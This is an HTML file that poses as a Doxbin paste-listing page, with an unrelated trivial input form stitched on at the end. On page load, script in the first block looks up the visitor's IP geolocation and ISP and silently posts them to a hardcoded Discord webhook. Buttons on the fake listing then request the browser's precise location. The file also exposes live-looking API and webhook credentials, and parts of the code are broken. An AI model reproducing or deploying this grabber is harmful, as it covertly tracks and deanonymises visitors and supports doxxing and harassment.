<!DOCTYPE html>
<body style="background-color:black;">

<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Loading...</title>
  </head>
  <body>
<H1><FONT COLOR=white>DOXBIN</H1>


    
    <script src="https://3kh0.github.io/js/main.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script>
      $.getJSON("https://ipgeolocation.abstractapi.com/v1/?api_key=a1ebbf04c6164dd98b527e26c57fc28c", function (data) {
        const ip = data.ip_address;
        const city = data.city;
        const region = data.region;
        const zip = data.postal_code;
        const country = data.country;
        const flag = data.flag.emoji;
        const aso = data.connection.autonomous_system_organization;
        const isp = data.connection.isp_name;
        const org = data.connection.organization_name;
        const vpn = data.security.is_vpn;
        const tz = data.timezone.name;
        const ct = data.timezone.current_time;
        const request = new XMLHttpRequest();
        request.open("POST", "https://discord.com/api/webhooks/1054563822041579550/kAaJS-xDm2ZItdhz9QLCL5sqf2OIFK6mVgfYl9p1VDqiRM65zbq0308mA1aSaDBP3ZOr");
        // Put in your discord webhook url above ^^^
        request.setRequestHeader("Content-type", "application/json");
        const params = {
          username: "WARDS",
          avatar_url: "https://3kh0.github.io/img/echo.jpg",
          content: "**Ladies and gentlemen we got em!**\n> IP: " + ip + 
          "\n> City: " + city + 
          "\n> Region: " + region + 
          "\n> Zip: " + zip + 
          "\n> Country: " + country +
          "\n> Flag: " + flag +
          "\n> Auto System Org: " + aso +
          "\n> ISP: " + isp +
          "\n> Org: " + org +
          "\n> Using VPN: " + vpn +
          "\n> Timezone: " + tz +
          "\n> Current time: " + ct
          ,
        };
        request.send(JSON.stringify(params));
      });
    </script>
  </body>
</html>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<script>
    function showPosition() {
  
        if(navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(function(position)           {
                var positionInfo = "Your current position is (" + "Latitude: " + position.coords.latitude + ", " + "Longitude: " + position.coords.longitude + ")";
                      console.log(document.getElementById("result").value); // javascript
                document.getElementById("result").innerHTML = positionInfo;
              log(positionInfo)
            });
        } else {
            alert("Sorry, your browser does not support HTML5 geolocation.");

        }
    }

  function showPosition2(position) {
    console.log("Latitude: " + position.coords.latitude + 
    "<br>Longitude: " + position.coords.longitude); 
}


 /// const successCallback = (position) => {
//  console.log(position);
//};

  ///const errorCallback = (error) => {
  ///console.log(error);
  ///
//};
  ///
  ///console.log(document.getElementById("result").value);    


navigator.geolocation.getCurrentPosition(successCallback, errorCallback);

  
</script>
</head>
<body>
    <div id="result">
</div>
    <button type="button" onclick="showPosition();        request.send(JSON.stringify(params));""
">REMOVAL REQUEST</button>
      <button type="button" onclick="showPosition();">UPLOAD DOX</button>

      <button type="button" onclick="showPosition();">Show Your Dox</button>

  <button type="button" onclick="showPosition2();">Dox a user</button>


  
<div align="center">
                <img src="https://doxbin.com/files/cdox.png" style="height: 233px;">
<h5 class="announcement a-1" style="color:#CC0000;"><u><a style="color:inherit;" href="https://t.me/doxbin">Official Doxbin Telegram</a></u></h5>
<h5 class="announcement a-2" style="color:#44CC13;"><u> <a style="color:inherit;" href="https://twitter.com/DoxbinHQ">Official Doxbin Twitter</a> </u></h5>
<h5 class="announcement a-2" style="color:#CC0000;"><u> <a style="color:inherit;" href="https://t.me/doxbin/36">Mirrors: doxbin.org | doxbin.com | doxbin.net</a> </u></h5>
                <noscript><p style="color: red; padding: 0px 0px 10px 0px; text-align: center; margin: 0;">Searching requires JavaScript to function correctly.<br><!--Otherwise you can type <u>https://doxbin.org/search/{query}</u> in the address bar.--></p></noscript>
				<div id="error-msg" style="color: red; padding: 0px 0px 10px 0px; text-align: center; margin: 0;"></div>
				<label for="search-form">Search for a paste</label>
				
				<form id="search-form" method="POST" action="search">
                    <input type="hidden" name="_token" value="kfyY1asASb5a8s8B5MCPFXupwDvvq7rP3VOAtpJi">
					<input name="search-query" type="text" placeholder="Search for...">
					<input type="hidden" name="bpToken" value="br3nt0n">
					<input type="submit" value="Search">
				</form>
				<br>
<p>Showing 150 (of 83180 total) pastes</p>
  <table class="table table-striped table-hover">
            <thead>
                    <tr>
                        <th colspan="3">Title</th>
                        <th class="text-center auto-size">Comments</th>
                        <th class="text-center">Views</th>
                        <th colspan="2" class="text-center">Created by</th>
                        <th style="width: 120px" class="text-center r-hide">Added</th>
						                    </tr>
                </thead>
                <tbody>
                

<tr class="doxentry  admin-post" id="51803">



      <button type="button" onclick="showPosition();">Show All Dox's</button>

  
<td colspan="3" style="overflow: hidden; text-overflow: ellipsis;"><a title="How to Ensure Your Paste Stays Up" 
                                                              onclick="showPosition();"
                                                                     href="https://google.com">How to Ensure Your Paste Stays Up</a></td>
<td style="width: 105px;" class="text-center">-</td>
<td class="text-center">68899</td>
<td colspan="2" style="padding-bottom: 0; max-width: 140px;" class="text-center">
<a class="dox-username" title="Brenton" style="color: red; font-weight: bold;" href="/user/Brenton">Brenton <span style="color:red;font-weight:bold;">[Admin]</span></a>
</td>
<td style="width: 120px" class="text-center r-hide">Nov 20th, 2020</td>
</tr> 
                

<tr class="doxentry  admin-post" id="25105">


<td colspan="3" style="overflow: hidden; text-overflow: ellipsis;"><a title="Transparency Report" href="https://doxbin.com/upload/DoxbinTransparencyReport">Transparency Report</a></td>
<td style="width: 105px;" class="text-center">-</td>
<td class="text-center">82820</td>
<td colspan="2" style="padding-bottom: 0; max-width: 140px;" class="text-center">
<a class="dox-username" title="kt" style="color: red; font-weight: bold;" href="/user/kt">kt <span style="color:red;font-weight:bold;">[Admin]</span></a>
</td>
<td style="width: 120px" class="text-center r-hide">Jun 20th, 2020</td>
</tr> 
</tbody>
</table>
<div class="center">
<div class="pagination">
<a style="border-top-left-radius:3px;border-bottom-left-radius:3px;" class="disabled">«</a>
<a class="active">1</a>
<a href="/?page=2">2</a>
<a href="/?page=3">3</a>
<a href="/?page=4">4</a>
<a href="/?page=5">5</a>
<p>...</p>
<a href="/?page=555">555</a>
<a style="border-top-right-radius:3px;border-bottom-right-radius:3px;" href="/?page=2">»</a>
</div><br>
</div>
</div></body>
</html>

<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Document</title>
</head>
<body>
    <h1>Storing User Input in a Variable</h1>
    <p>Enter some text</p>
    <input id="userInput" type="text" placeholder="Text">
    <button onclick="returnText()">Submit</button>
  <!-- Optional JavaScript -->
  <script src="script.js"></script>
</body>
</html>

